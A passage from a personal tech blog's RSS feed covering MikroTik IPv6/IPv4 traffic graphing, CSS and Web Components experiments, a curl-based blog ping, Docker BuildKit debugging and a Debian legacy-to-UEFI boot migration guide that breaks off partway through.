  1140. <p>IPv6 Traffic<br>
  1141. <img src="" width="492" height="251" alt="Weekly traffic graph of the IPv6 queue, showing an average of 379.65Kb incoming traffic."></p>
  1142. <p>IPv4 Traffic<br>
  1143. <img src="" width="492" height="251" alt="Weekly traffic graph of the IPv4 queue, showing an average of 21.49Kb incoming traffic."></p>
  1144. <p>Happy to see that a large majority of my traffic uses IPv6 :-)</p>
  1145. ]]></description>
  1146.    <content:encoded><![CDATA[<p>Out of curiosity I wanted to know how much of my Internet traffic uses IPv6 vs the <a href="">legacy IPv4</a>.</p>
  1147. <p>There is no out-of-the-box graph for this in MikroTik.<br>Several forum and Stack Overflow posts suggest using ratelimiting queues with their graphing feature to collect this data.<p>
  1148. <p>After experimenting a bit, I ended up with the following configuration which creates two queues to collect the traffic data.<br>Important to know, traffic flows on a first-match basis through the queues. Thus the trick of having first the queue matching IPv6 traffic and then the queue matching all the remaining traffic.<br>Also, I use <code>10G</code> as 'unreachable' traffic limit to avoid any traffic being ratelimited. This works well for my 1Gbit/s setup, but will need to be adjusted if you have a higher bandwidth.</p>
  1149. <pre>/queue simple add limit-at=10G/10G max-limit=10G/10G name=v6-traffic queue=ethernet-default/ethernet-default target=2000::/3 total-queue=ethernet-default
  1150. /queue simple add limit-at=10G/10G max-limit=10G/10G name=v4-traffic queue=ethernet-default/ethernet-default target="" total-queue=ethernet-default</pre>
  1151. <p>Having the queues in place for a couple days results in the following graphs:</p>
  1152. <p>IPv6 Traffic<br>
  1153. <img src="" width="492" height="251" alt="Weekly traffic graph of the IPv6 queue, showing an average of 379.65Kb incoming traffic."></p>
  1154. <p>IPv4 Traffic<br>
  1155. <img src="" width="492" height="251" alt="Weekly traffic graph of the IPv4 queue, showing an average of 21.49Kb incoming traffic."></p>
  1156. <p>Happy to see that a large majority of my traffic uses IPv6 :-)</p>
  1157. ]]></content:encoded>
  1158.  </item>
  1160.  <item>
  1161.    <title>More modern technologies</title>
  1162.    <link></link>
  1163.    <guid isPermaLink="true"></guid>
  1164.    <dc:creator>Andreas Jaggi</dc:creator>
  1165.    <creativeCommons:license></creativeCommons:license>
  1166.    <pubDate>Tue, 18 Jun 2024 20:59:00 +0200</pubDate>
  1167.    <category domain="">Webdesign</category>
  1168.    <description><![CDATA[<p>After the recent <a href="" title="Jumping on the Web Components bandwagon - x-log">integration of Web Components in the blog</a>, I made yet another stab at using some modern technologies.</p>
  1169. <p>This time inspired by the <a href="" title="Ten years of A Single Div | Lynn Fisher">Ten years of A Single Div</a> article, my focus was on the <a href="" title="linear-gradient() - CSS | MDN">linear-gradient()</a> and <a  href="" title="radial-gradient() - CSS | MDN">radial-gradient()</a> CSS properties.</p>
  1170. <p>They can be combined to draw almost arbitrary shapes with pure CSS.</p>
  1171. <p>I used this to replace all graphics on <a href="" title=""></a> with CSS, while keeping the layout and functionality identical to the <a href="" title=" (">original 2005 version</a>.</p>
  1172. <p>In the process of this, also some additional modern CSS features were used:<br>
  1173. <a href="" title="var() - CSS | MDN">var()</a> to simplify repeating CSS code.<br>
  1174. <a href="" title="animation - CSS | MDN">animation</a>/<a href="" title="@keyframes - CSS | MDN">@keyframes</a> to add a little fade-in effect on the hover text.</p>
  1175. ]]></description>
  1176.    <content:encoded><![CDATA[<p>After the recent <a href="" title="Jumping on the Web Components bandwagon - x-log">integration of Web Components in the blog</a>, I made yet another stab at using some modern technologies.</p>
  1177. <p>This time inspired by the <a href="" title="Ten years of A Single Div | Lynn Fisher">Ten years of A Single Div</a> article, my focus was on the <a href="" title="linear-gradient() - CSS | MDN">linear-gradient()</a> and <a  href="" title="radial-gradient() - CSS | MDN">radial-gradient()</a> CSS properties.</p>
  1178. <p>They can be combined to draw almost arbitrary shapes with pure CSS.</p>
  1179. <p>I used this to replace all graphics on <a href="" title=""></a> with CSS, while keeping the layout and functionality identical to the <a href="" title=" (">original 2005 version</a>.</p>
  1180. <p>In the process of this, also some additional modern CSS features were used:<br>
  1181. <a href="" title="var() - CSS | MDN">var()</a> to simplify repeating CSS code.<br>
  1182. <a href="" title="animation - CSS | MDN">animation</a>/<a href="" title="@keyframes - CSS | MDN">@keyframes</a> to add a little fade-in effect on the hover text.</p>
  1183. ]]></content:encoded>
  1184.  </item>
  1186.  <item>
  1187.    <title>Jumping on the Web Components bandwagon</title>
  1188.    <link></link>
  1189.    <guid isPermaLink="true"></guid>
  1190.    <dc:creator>Andreas Jaggi</dc:creator>
  1191.    <creativeCommons:license></creativeCommons:license>
  1192.    <pubDate>Sun, 16 Jun 2024 21:53:00 +0200</pubDate>
  1193.    <category domain="">Webdesign</category>
  1194.    <description><![CDATA[<p>The <a href="" title="YouTube and Vimeo Web Component - Adrian Roselli">recent article from Adrian Roselli</a> explaining how to write a Web Component for YouTube and Vimeo videos, triggered me to finally adopt the Web Components technology for my blog.<br>Additionally there is <a href="" title="Markus Kniebes">Markus</a> using <a href="" title="Sharing Web Component (">Web Components for his blog</a> since quite some time, which gave me confidence.</p>
  1195. <p>Implementing Web Components was now not only for the sake of learning about the technology, but also to address some longstanding painpoints I had with my embedded videos.<br>In particular did I not like that each embedded video triggered the loading of a plethora of third-party scripts and styles only to render the thumbnail image. And additionally this leaked tracking/cookie information to the video hosters (yes, I was using to reduce this as far as possible, but could not eliminate it completely).</p>
  1196. <p>Thus I added a <code>&lt;youtube-vimeo-embed&gt;</code> Web Component and changed all my embedded YouTube and Vimeo videos to use it.</p>
  1197. <p>My implementation is almost a 1:1 copy of the <a href="" title="GitHub - aardrian/youtube-vimeo-embed: A custom element to embed either a YouTube or Vimeo video into your page.">code provided by Adrian</a>, with some minor adaptions (such as hiding the original link when the video iframe can be rendered and always enabling fullscreen mode in videos).</p>
  1198. <p>I'm quite happy with the outcome, as it provides some new benefits:<br>
  1199. Except for the thumbnail image, no other third-party resources are loaded until someone clicks on the play button.<br>
  1200. When JavaScript or Web Components are not supported by a browser, it gracefuly falls back to a simple link to the video.<br>
  1201. Loading speed of the whole page improved quite a bit, as videos are only loaded on demand.<br>
  1202. It always uses and third-party scripts are only loaded if someone explicitly clicks on the play button of a video :-)</p>
  1203. ]]></description>
  1204.    <content:encoded><![CDATA[<p>The <a href="" title="YouTube and Vimeo Web Component - Adrian Roselli">recent article from Adrian Roselli</a> explaining how to write a Web Component for YouTube and Vimeo videos, triggered me to finally adopt the Web Components technology for my blog.<br>Additionally there is <a href="" title="Markus Kniebes">Markus</a> using <a href="" title="Sharing Web Component (">Web Components for his blog</a> since quite some time, which gave me confidence.</p>
  1205. <p>Implementing Web Components was now not only for the sake of learning about the technology, but also to address some longstanding painpoints I had with my embedded videos.<br>In particular did I not like that each embedded video triggered the loading of a plethora of third-party scripts and styles only to render the thumbnail image. And additionally this leaked tracking/cookie information to the video hosters (yes, I was using to reduce this as far as possible, but could not eliminate it completely).</p>
  1206. <p>Thus I added a <code>&lt;youtube-vimeo-embed&gt;</code> Web Component and changed all my embedded YouTube and Vimeo videos to use it.</p>
  1207. <p>My implementation is almost a 1:1 copy of the <a href="" title="GitHub - aardrian/youtube-vimeo-embed: A custom element to embed either a YouTube or Vimeo video into your page.">code provided by Adrian</a>, with some minor adaptions (such as hiding the original link when the video iframe can be rendered and always enabling fullscreen mode in videos).</p>
  1208. <p>I'm quite happy with the outcome, as it provides some new benefits:<br>
  1209. Except for the thumbnail image, no other third-party resources are loaded until someone clicks on the play button.<br>
  1210. When JavaScript or Web Components are not supported by a browser, it gracefuly falls back to a simple link to the video.<br>
  1211. Loading speed of the whole page improved quite a bit, as videos are only loaded on demand.<br>
  1212. It always uses and third-party scripts are only loaded if someone explicitly clicks on the play button of a video :-)</p>
  1213. ]]></content:encoded>
  1214.  </item>
  1216.  <item>
  1217.    <title> still Pinging</title>
  1218.    <link></link>
  1219.    <guid isPermaLink="true"></guid>
  1220.    <dc:creator>Andreas Jaggi</dc:creator>
  1221.    <creativeCommons:license></creativeCommons:license>
  1222.    <pubDate>Wed, 12 Jun 2024 06:28:00 +0200</pubDate>
  1223.    <category domain="">Coding</category>
  1224.    <description><![CDATA[<p>While browsing posts from the past on the <a href="" title="x-log - On this day">On this day</a> page, I saw the one about <a href="" title=""></a> from <a href="" title="x-log -">2002</a>.</p>
  1225. <p>Turns out the ping mechanism is still working in exactly the same way after all these years (nowadays operated by Automattic).</p>
  1226. <p>As I don't run my blog with PHP anymore, I added the following step at the end of my deploy script.<br>It uses <code>curl</code> to peform <a href="" title=" weblogUpdates.extendedPing example">the XML-RPC call</a> of the <code>weblogUpdates.extendedPing</code> API with the parameters for my weblog.</p>
  1227. <pre>curl -X POST -v -H 'content-type: text/xml' --data '&lt;?xml version="1.0"?&gt;&lt;methodCall&gt;&lt;methodName&gt;weblogUpdates.extendedPing&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;x-log&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;'</pre>
  1228. ]]></description>
  1229.    <content:encoded><![CDATA[<p>While browsing posts from the past on the <a href="" title="x-log - On this day">On this day</a> page, I saw the one about <a href="" title=""></a> from <a href="" title="x-log -">2002</a>.</p>
  1230. <p>Turns out the ping mechanism is still working in exactly the same way after all these years (nowadays operated by Automattic).</p>
  1231. <p>As I don't run my blog with PHP anymore, I added the following step at the end of my deploy script.<br>It uses <code>curl</code> to peform <a href="" title=" weblogUpdates.extendedPing example">the XML-RPC call</a> of the <code>weblogUpdates.extendedPing</code> API with the parameters for my weblog.</p>
  1232. <pre>curl -X POST -v -H 'content-type: text/xml' --data '&lt;?xml version="1.0"?&gt;&lt;methodCall&gt;&lt;methodName&gt;weblogUpdates.extendedPing&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;x-log&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;'</pre>
  1233. ]]></content:encoded>
  1234.  </item>
  1236.  <item>
  1237.    <title>Run Your Own Mail Server</title>
  1238.    <link></link>
  1239.    <guid isPermaLink="true"></guid>
  1240.    <dc:creator>Andreas Jaggi</dc:creator>
  1241.    <creativeCommons:license></creativeCommons:license>
  1242.    <pubDate>Fri, 31 May 2024 20:24:00 +0200</pubDate>
  1243.    <category domain="">Linux</category>
  1244.    <description><![CDATA[<p><a href="" title="About Me - Michael W Lucas">Michael W Lucas</a> is running a <a href="" title="Run Your Own Mail Server: A Book for Independence &amp; Privacy">Kickstarter campaign</a> to fund writing of book providing the knowledge to run your own mail server.</p>
  1245. <p>As I'm running my own mail server (coincidently with some of the tools that will be discussed in the book: Debian, Postfix, Dovecot), I do sympathize with this initiative and would recommend to support the campaign.</p>
  1246. ]]></description>
  1247.    <content:encoded><![CDATA[<p><a href="" title="About Me - Michael W Lucas">Michael W Lucas</a> is running a <a href="" title="Run Your Own Mail Server: A Book for Independence &amp; Privacy">Kickstarter campaign</a> to fund writing of book providing the knowledge to run your own mail server.</p>
  1248. <p>As I'm running my own mail server (coincidently with some of the tools that will be discussed in the book: Debian, Postfix, Dovecot), I do sympathize with this initiative and would recommend to support the campaign.</p>
  1249. ]]></content:encoded>
  1250.  </item>
  1252.  <item>
  1253.    <title>udm=14</title>
  1254.    <link></link>
  1255.    <guid isPermaLink="true"></guid>
  1256.    <dc:creator>Andreas Jaggi</dc:creator>
  1257.    <creativeCommons:license></creativeCommons:license>
  1258.    <pubDate>Sat, 25 May 2024 09:30:00 +0200</pubDate>
  1259.    <category domain="">Misc</category>
  1260.    <description><![CDATA[<p>As seen <a href="" title="Old School Google - vowe dot net">all</a> <a href="" title="Daring Fireball: How to Make Google’s 'Web' View Your Search Default">over</a> <a href="" title="How to get Google search results without the AI garbage">the</a> <a href="" title="&amp;udm=14 | the disenshittification Konami code">place</a>, adding <code>udm=14</code> to the URL of a Google search makes the result display less crappy (no ads, no AI suggestions to <a href="" title="Google AI search tells users to glue pizza and eat rocks">eat rocks or put glue on pizza</a>, &hellip;).<br>The search results themselves of course are not really getting better with this, but at least the search experience is less annoying.</p>
  1261. <p>For the Desktop edition of Firefox you will need to use the <a href="" title="udm14 - Get this Extension for Firefox">udm14 extension</a> to add the <code>udm=14</code> parameter by default to your search bar.<br>For other browsers it should be enough to modify the settings of the search URL used and add the parameter (something like <code>;udm=14</code>).<br>Or even better, do use an alternative search engine :-)</p>
  1262. ]]></description>
  1263.    <content:encoded><![CDATA[<p>As seen <a href="" title="Old School Google - vowe dot net">all</a> <a href="" title="Daring Fireball: How to Make Google’s 'Web' View Your Search Default">over</a> <a href="" title="How to get Google search results without the AI garbage">the</a> <a href="" title="&amp;udm=14 | the disenshittification Konami code">place</a>, adding <code>udm=14</code> to the URL of a Google search makes the result display less crappy (no ads, no AI suggestions to <a href="" title="Google AI search tells users to glue pizza and eat rocks">eat rocks or put glue on pizza</a>, &hellip;).<br>The search results themselves of course are not really getting better with this, but at least the search experience is less annoying.</p>
  1264. <p>For the Desktop edition of Firefox you will need to use the <a href="" title="udm14 - Get this Extension for Firefox">udm14 extension</a> to add the <code>udm=14</code> parameter by default to your search bar.<br>For other browsers it should be enough to modify the settings of the search URL used and add the parameter (something like <code>;udm=14</code>).<br>Or even better, do use an alternative search engine :-)</p>
  1265. ]]></content:encoded>
  1266.  </item>
  1268.  <item>
  1269.    <title>Recent Docker BuildKit Features</title>
  1270.    <link></link>
  1271.    <guid isPermaLink="true"></guid>
  1272.    <dc:creator>Andreas Jaggi</dc:creator>
  1273.    <creativeCommons:license></creativeCommons:license>
  1274.    <pubDate>Mon, 20 May 2024 07:24:00 +0200</pubDate>
  1275.    <category domain="">Linux</category>
  1276.    <description><![CDATA[<p>In the <a href="" title="Recent Docker BuildKit Features You're Missing Out On | Martin Heinz | Personal Website &amp; Blog">Recent Docker BuildKit Features You're Missing Out On</a> article, <a href="" title="Martin Heinz | Personal Website &amp; Blog">Martin Heinz</a> lists some of the new features that have been added to Docker with the BuildKit introduction.</p>
  1277. <p>My favorite one is the <a href="" title="debugging docs">debugger for failed build steps</a> of a container:</p>
  1278. <pre>export BUILDX_EXPERIMENTAL=1
  1279. docker buildx debug --invoke /bin/sh --on=error build .</pre>
  1280. ]]></description>
  1281.    <content:encoded><![CDATA[<p>In the <a href="" title="Recent Docker BuildKit Features You're Missing Out On | Martin Heinz | Personal Website &amp; Blog">Recent Docker BuildKit Features You're Missing Out On</a> article, <a href="" title="Martin Heinz | Personal Website &amp; Blog">Martin Heinz</a> lists some of the new features that have been added to Docker with the BuildKit introduction.</p>
  1282. <p>My favorite one is the <a href="" title="debugging docs">debugger for failed build steps</a> of a container:</p>
  1283. <pre>export BUILDX_EXPERIMENTAL=1
  1284. docker buildx debug --invoke /bin/sh --on=error build .</pre>
  1285. ]]></content:encoded>
  1286.  </item>
  1288.  <item>
  1289.    <title>Migrations</title>
  1290.    <link></link>
  1291.    <guid isPermaLink="true"></guid>
  1292.    <dc:creator>Andreas Jaggi</dc:creator>
  1293.    <creativeCommons:license></creativeCommons:license>
  1294.    <pubDate>Mon, 20 May 2024 06:02:00 +0200</pubDate>
  1295.    <category domain="">Coding</category>
  1296.    <description><![CDATA[<blockquote cite="">
  1297. <p>Migrations are not something you can do rarely, or put off, or avoid; not if you are a growing company. Migrations are an ordinary fact of life.</p>
  1298. <p>Doing them swiftly, efficiently, and -- most of all -- *completely* is one of the most critical skills you can develop as a team.</p>
  1299. </blockquote>
  1300. <p>&mdash; <a href="" title="Charity Majors">Charity Majors</a> (<a href="" title="A quote from Charity Majors">via</a>)</p>
  1301. ]]></description>
  1302.    <content:encoded><![CDATA[<blockquote cite="">
  1303. <p>Migrations are not something you can do rarely, or put off, or avoid; not if you are a growing company. Migrations are an ordinary fact of life.</p>
  1304. <p>Doing them swiftly, efficiently, and -- most of all -- *completely* is one of the most critical skills you can develop as a team.</p>
  1305. </blockquote>
  1306. <p>&mdash; <a href="" title="Charity Majors">Charity Majors</a> (<a href="" title="A quote from Charity Majors">via</a>)</p>
  1307. ]]></content:encoded>
  1308.  </item>
  1310.  <item>
  1311.    <title>Building a Geocities website in 1998</title>
  1312.    <link></link>
  1313.    <guid isPermaLink="true"></guid>
  1314.    <dc:creator>Andreas Jaggi</dc:creator>
  1315.    <creativeCommons:license></creativeCommons:license>
  1316.    <pubDate>Sun, 19 May 2024 11:35:00 +0200</pubDate>
  1317.    <category domain="">Misc</category>
  1318.    <description><![CDATA[<p><a href="" title="Building a Geocities website in 1998 - YouTube">Building a Geocities website in 1998</a></p>
  1319. <p>Brings back some faint memories of young me playing around with FrontPage (wondering why the preview rendering of an animated fullscreen background of a burning fire is making the computer go slow&hellip;)</p>
  1320. <p>(<a href="" title="Web links of the week - cassidoo">via</a>)</p>
  1321. ]]></description>
  1322.    <content:encoded><![CDATA[<p><a href="" title="Building a Geocities website in 1998 - YouTube">Building a Geocities website in 1998</a></p>
  1323. <p>Brings back some faint memories of young me playing around with FrontPage (wondering why the preview rendering of an animated fullscreen background of a burning fire is making the computer go slow&hellip;)</p>
  1324. <p>(<a href="" title="Web links of the week - cassidoo">via</a>)</p>
  1325. ]]></content:encoded>
  1326.  </item>
  1328.  <item>
  1329.    <title>On this day</title>
  1330.    <link></link>
  1331.    <guid isPermaLink="true"></guid>
  1332.    <dc:creator>Andreas Jaggi</dc:creator>
  1333.    <creativeCommons:license></creativeCommons:license>
  1334.    <pubDate>Mon, 13 May 2024 07:00:00 +0200</pubDate>
  1335.    <category domain="">Misc</category>
  1336.    <description><![CDATA[<p>In his <a href="" title="It was twenty years ago today &mdash; Terence Eden's Blog">20 year anniversary post</a>, <a href="" title="Terence Eden's Blog">Terence Eden</a> explains how he uses the "<a href="" title="On This Day &mdash; Terence Eden's Blog">On This Day</a>" feature of his blog every morning to look back on what he was writing on this day in previous years.</p>
  1337. <p>Finding this very inspiring, I decided to add a similar feature to my blog.<br>As my blog is built with Jekyll as static pages, some plain old JavaScript was needed to surface the posts of this day without having to rebuild the page daily.</p>
  1338. <p>And here we have now the <a href="" title="x-log - On This day">On this day</a> page :-)</p>
  1339. ]]></description>
  1340.    <content:encoded><![CDATA[<p>In his <a href="" title="It was twenty years ago today &mdash; Terence Eden's Blog">20 year anniversary post</a>, <a href="" title="Terence Eden's Blog">Terence Eden</a> explains how he uses the "<a href="" title="On This Day &mdash; Terence Eden's Blog">On This Day</a>" feature of his blog every morning to look back on what he was writing on this day in previous years.</p>
  1341. <p>Finding this very inspiring, I decided to add a similar feature to my blog.<br>As my blog is built with Jekyll as static pages, some plain old JavaScript was needed to surface the posts of this day without having to rebuild the page daily.</p>
  1342. <p>And here we have now the <a href="" title="x-log - On This day">On this day</a> page :-)</p>
  1343. ]]></content:encoded>
  1344.  </item>
  1346.  <item>
  1347.    <title>Warm weather warm colors</title>
  1348.    <link></link>
  1349.    <guid isPermaLink="true"></guid>
  1350.    <dc:creator>Andreas Jaggi</dc:creator>
  1351.    <creativeCommons:license></creativeCommons:license>
  1352.    <pubDate>Sat, 11 May 2024 20:03:00 +0200</pubDate>
  1353.    <category domain="">Webdesign</category>
  1354.    <description><![CDATA[<p>The warm temperatures around here made me change the blog theme back to the warm colors ☀️</p>
  1355. <p>Basically it's a revert of the <a href="" title="x-log - Winter - plain 2">winter layout changes</a> from beginning of the year, while keeping <a href="" title="x-log - Valid HTML5">all</a> <a href="" title="x-log - Quick and dirty dark mode">the</a> <a href="" title="x-log - Tables are gone">HTML modernizations</a> done afterwards :-)</p>
  1356. <p>We're back on the <a href="" title="x-log - Blogging like 2002">original 2002 layout</a> (with modern HTML), for those trying to keep score. Enjoy!</p>
  1357. ]]></description>
  1358.    <content:encoded><![CDATA[<p>The warm temperatures around here made me change the blog theme back to the warm colors ☀️</p>
  1359. <p>Basically it's a revert of the <a href="" title="x-log - Winter - plain 2">winter layout changes</a> from beginning of the year, while keeping <a href="" title="x-log - Valid HTML5">all</a> <a href="" title="x-log - Quick and dirty dark mode">the</a> <a href="" title="x-log - Tables are gone">HTML modernizations</a> done afterwards :-)</p>
  1360. <p>We're back on the <a href="" title="x-log - Blogging like 2002">original 2002 layout</a> (with modern HTML), for those trying to keep score. Enjoy!</p>
  1361. ]]></content:encoded>
  1362.  </item>
  1364.  <item>
  1365.    <title>The KonCodie Method</title>
  1366.    <link></link>
  1367.    <guid isPermaLink="true"></guid>
  1368.    <dc:creator>Andreas Jaggi</dc:creator>
  1369.    <creativeCommons:license></creativeCommons:license>
  1370.    <pubDate>Sat, 11 May 2024 17:09:00 +0200</pubDate>
  1371.    <category domain="">Coding</category>
  1372.    <description><![CDATA[<p>What if <a href="" title="KonMarie | The Official Website of Marie Kondo">Marie Kondo</a> would become a software engineer?</p>
  1373. <p><a href="" title="200 OK">Ben Buchanan</a> did run a parody account on this topic and has archived the posts <a href="" title="The KonCodie Method | the 200ok weblog">on his site</a>.</p>
  1374. <p>There are some gems :-)</p>
  1375. <blockquote cite=""><p>To choose what to keep and what to throw away, take each dependency in one's manifest and ask: "Does this spark joy?" If it does, keep it. If not, remove it from your codebase.</p></blockquote>
  1376. <blockquote cite=""><p>We should be choosing what to <code>.gitkeep</code>, not what we want to <code>.gitignore</code></p></blockquote>
  1377. <blockquote cite=""><p>Cruft has only two possible causes: too much effort is required to refactor or it is unclear where things belong.</p></blockquote>
  1378. ]]></description>
  1379.    <content:encoded><![CDATA[<p>What if <a href="" title="KonMarie | The Official Website of Marie Kondo">Marie Kondo</a> would become a software engineer?</p>
  1380. <p><a href="" title="200 OK">Ben Buchanan</a> did run a parody account on this topic and has archived the posts <a href="" title="The KonCodie Method | the 200ok weblog">on his site</a>.</p>
  1381. <p>There are some gems :-)</p>
  1382. <blockquote cite=""><p>To choose what to keep and what to throw away, take each dependency in one's manifest and ask: "Does this spark joy?" If it does, keep it. If not, remove it from your codebase.</p></blockquote>
  1383. <blockquote cite=""><p>We should be choosing what to <code>.gitkeep</code>, not what we want to <code>.gitignore</code></p></blockquote>
  1384. <blockquote cite=""><p>Cruft has only two possible causes: too much effort is required to refactor or it is unclear where things belong.</p></blockquote>
  1385. ]]></content:encoded>
  1386.  </item>
  1388.  <item>
  1389.    <title>If you don't fit...</title>
  1390.    <link></link>
  1391.    <guid isPermaLink="true"></guid>
  1392.    <dc:creator>Andreas Jaggi</dc:creator>
  1393.    <creativeCommons:license></creativeCommons:license>
  1394.    <pubDate>Sun, 05 May 2024 20:40:00 +0200</pubDate>
  1395.    <category domain="">Misc</category>
  1396.    <description><![CDATA[<p><a href="" title="A sad little puzzle piece is looking at a puzzle with no room for him. The text says &quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; Then the piece joins a puzzle that is full of friendly pieces with lots of room"><img src="" height="500" width="400" alt="A sad little puzzle piece is looking at a puzzle with no room for him. The text says &quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; Then the piece joins a puzzle that is full of friendly pieces with lots of room"></a></p>
  1397. <p>&quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; &mdash; <a href="" title="ADMIRAL WONDERBOAT">Admiral</a> <a href="" title="ADMIRAL WONDERBOAT">Wonderboat</a> (<a href="" title="Su-Shee">via</a>)</p>
  1398. ]]></description>
  1399.    <content:encoded><![CDATA[<p><a href="" title="A sad little puzzle piece is looking at a puzzle with no room for him. The text says &quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; Then the piece joins a puzzle that is full of friendly pieces with lots of room"><img src="" height="500" width="400" alt="A sad little puzzle piece is looking at a puzzle with no room for him. The text says &quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; Then the piece joins a puzzle that is full of friendly pieces with lots of room"></a></p>
  1400. <p>&quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; &mdash; <a href="" title="ADMIRAL WONDERBOAT">Admiral</a> <a href="" title="ADMIRAL WONDERBOAT">Wonderboat</a> (<a href="" title="Su-Shee">via</a>)</p>
  1401. ]]></content:encoded>
  1402.  </item>
  1404.  <item>
  1405.    <title>Migrate from legacy CSM boot to UEFI boot</title>
  1406.    <link></link>
  1407.    <guid isPermaLink="true"></guid>
  1408.    <dc:creator>Andreas Jaggi</dc:creator>
  1409.    <creativeCommons:license></creativeCommons:license>
  1410.    <pubDate>Sun, 05 May 2024 16:00:00 +0200</pubDate>
  1411.    <category domain="">Linux</category>
  1412.    <description><![CDATA[<p>Due to a hardware failure I had to replace one of my computers (switching from a <a href="" title="Intel NUC SWIFT CANYON NUC6I5SYH">2015 Intel NUC</a> to a <a href="" title="Dell OptiPlex MFF">Dell OptiPlex Micro 7010</a>).<br>
  1413. After moving the disk to the new system, it refused to boot (claimed that no bootable drive was available).</p>
  1414. <p>Turns out that the new system only supports UEFI booting and the existing disk was setup for 'legacy'/CSM boot.</p>
  1415. <p>I used the following steps to convert the existing disk to UEFI boot (while keeping all data on it available).<br>They are inspired by the excellent <a href="" title="Switch Debian from legacy to UEFI boot mode">Switch Debian from legacy to UEFI boot mode</a> guide from <a href="" title="Jens Getreu">Jens Getreu</a>.</p>
  1416. <ol>
  1417. <li>Disable secure boot in the BIOS to allow booting from an USB stick.</li>
  1418. <li>Create a bootable USB stick with a Debian live system (see <a href="" title="Create a bootable Debian USB stick on macOS">my previous post</a>)</li>
  1419. <li>Boot into the Debian live system</li>
  1420. <li>Identify the disk to work on (<code>/dev/nvme0n1</code> in my case)</li>
  1421. <li>Convert the partition table from MBR to GPT:
  1422. <pre># gdisk /dev/nvme0n1
  1424. r       recovery and transformation options (experts only)
  1425. f       load MBR and build fresh GPT from it
  1426. w write table to disk and exit</pre></li>
  1427. <li>Install gparted into the Debian live system:
  1428. <pre># apt-get install gparted</pre></li>
  1429. <li>Create an UEFI partition and a partition for Grub2:
  1430. <pre># gparted /dev/nvme0n1</pre>
  1431. Resize an existing partition to create space (does not need to be at the beginning of the disk, I used the swap partition).<br>
  1432. Create a new 100MB partition for efi (named "Efi partition"), format it as <code>fat32</code> and flag it <code>bootable</code>.<br>
  1433. Create a new 50MB partition for Grub2 (named "BIOS boot partition"), keep it unformatted.</li>
  1434. <li>Use gdisk to set proper partition codes (<code>EF00</code> for the efi partition and <code>EF02</code> for the Grub2 partition):
  1435. <pre># gdisk /dev/nvme0n1
  1437. p print the partition table
  1438. t change a partition's type code
  1439. t change a partition's type code
  1440. w write table to disk and exit</pre></li>
  1441. <li>Chroot into the on-disk root system:
  1442. <pre># mount -t ext4 /dev/nvme0n1p1 /mnt
  1443. # mkdir /mnt/boot/efi
  1444. # mount /dev/nvme0n1p2 /mnt/boot/efi
  1445. # mount --bind /sys /mnt/sys
  1446. # mount --bind /proc /mnt/proc
  1447. # mount --bind /dev /mnt/dev
  1448. # mount --bind /dev/pts /mnt/dev/pts
  1449. # cp /etc/resolv.conf /mnt/etc/resolv.conf
  1450. # chroot /mnt</pre></li>
  1451. <li>Update /etc/fstab:
  1452. <pre># ls -lisa /dev/disk/by-uuid</pre>
  1453. Identify the UUID of the EFI partition (usually in the format <code>XXXX-XXXX</code>) and add a corresponding line to <code>/etc/fstab</code>:
  1454. <pre># echo "UUID=XXXX-XXXX /boot/efi vfat defaults 0 2" &gt;&gt; /etc/fstab</pre></li>
  1455. <li>Install grub-efi and install Grub2 to the EFI partition:
  1456. <pre># apt-get remove grub-pc
  1457. # apt-get install grub-efi</pre>
  1458. <pre># grub-install /dev/nvme0n1</pre></li>
  1459. <li>Exit the chroot and reboot the system:
  1460. <pre># exit
  1461. # reboot</pre></li>
  1462. <li>Select the Debian bootloader (<code>/EFI/debian/grubx64.efi</code>) in the UEFI BIOS and make it the default :-)</li>
  1463. </ol>
  1464. ]]></description>
  1465.    <content:encoded><![CDATA[<p>Due to a hardware failure I had to replace one of my computers (switching from a <a href="" title="Intel NUC SWIFT CANYON NUC6I5SYH">2015 Intel NUC</a> to a <a href="" title="Dell OptiPlex MFF">Dell OptiPlex Micro 7010</a>).<br>
  1466. After moving the disk to the new system, it refused to boot (claimed that no bootable drive was available).</p>
  1467. <p>Turns out that the new system only supports UEFI booting and the existing disk was setup for 'legacy'/CSM boot.</p>
  1468. <p>I used the following steps to convert the existing disk to UEFI boot (while keeping all data on it available).<br>They are inspired by the excellent <a href="" title="Switch Debian from legacy to UEFI boot mode">Switch Debian from legacy to UEFI boot mode</a> guide from <a href="" title="Jens Getreu">Jens Getreu</a>.</p>
  1469. <ol>
  1470. <li>Disable secure boot in the BIOS to allow booting from an USB stick.</li>
  1471. <li>Create a bootable USB stick with a Debian live system (see <a href="" title="Create a bootable Debian USB stick on macOS">my previous post</a>)</li>
  1472. <li>Boot into the Debian live system</li>
  1473. <li>Identify the disk to work on (<code>/dev/nvme0n1</code> in my case)</li>
  1474. <li>Convert the partition table from MBR to GPT:
  1475. <pre># gdisk /dev/nvme0n1
  1477. r       recovery and transformation options (experts only)
  1478. f       load MBR and build fresh GPT from it
  1479. w write table to disk and exit</pre></li>
  1480. <li>Install gparted into the Debian live system:
  1481. <pre># apt-get install gparted</pre></li>
  1482. <li>Create an UEFI partition and a partition for Grub2:
  1483. <pre># gparted /dev/nvme0n1</pre>
  1484. Resize an existing partition to create space (does not need to be at the beginning of the disk, I used the swap partition).<br>
  1485. Create a new 100MB partition for efi (named "Efi partition"), format it as <code>fat32</code> and flag it <code>bootable</code>.<br>
  1486. Create a new 50MB partition for Grub2 (named "BIOS boot partition"), keep it unformatted.</li>
  1487. <li>Use gdisk to set proper partition codes (<code>EF00</code> for the efi partition and <code>EF02</code> for the Grub2 partition):
